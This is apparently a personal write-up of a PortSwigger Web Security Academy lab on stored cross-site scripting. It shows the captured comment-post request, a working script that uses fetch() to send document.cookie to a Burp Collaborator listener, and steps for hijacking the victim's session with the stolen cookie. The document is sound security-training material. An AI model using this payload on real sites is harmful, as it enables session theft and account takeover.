XSS steal cookie with Burp Collaborator Client

xss

Lab: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies

We find a comment form where the comment textarea is vulnerable to XSS, it allows for a `<script></script> tag to be added:

POST /post/comment HTTP/1.1
Host: 0af300520318173cc0b112ad00b500fc.web-security-academy.net
Cookie: session=YGg6YyTDoKJ2p6A7D8zmAfr1GlCrEuUC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
Origin: https://0af300520318173cc0b112ad00b500fc.web-security-academy.net
Referer: https://0af300520318173cc0b112ad00b500fc.web-security-academy.net/post?postId=9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

csrf=o9OoCV5mQZR31oqiKBDuMG2NyFzGL0Tr&postId=9&comment=%3cscript%3ealert(1)%3c%2fscript%3e&name=thisname&email=thisemail%40thisemail.com&website=https%3A%2F%2Fthiswebsite.com

Open up Burp Suite Collaborator to generate an oastify domain to listen on. Then add the following script as the comment:

<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

E.g.:

<script>
fetch('https://kj735uykrnzdps1m0nfqrfl6hxnpbe.oastify.com', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

Post this, then go back to Burp Collaborator and look for a HTTP request with a new session cookie.

Replace the session cookie in Burp Repeater with the one from Burp Collaborator, right-click >> Request in browser >> In original session. You can now open that link and be logged in with that user's session.


You might be interested in these notes: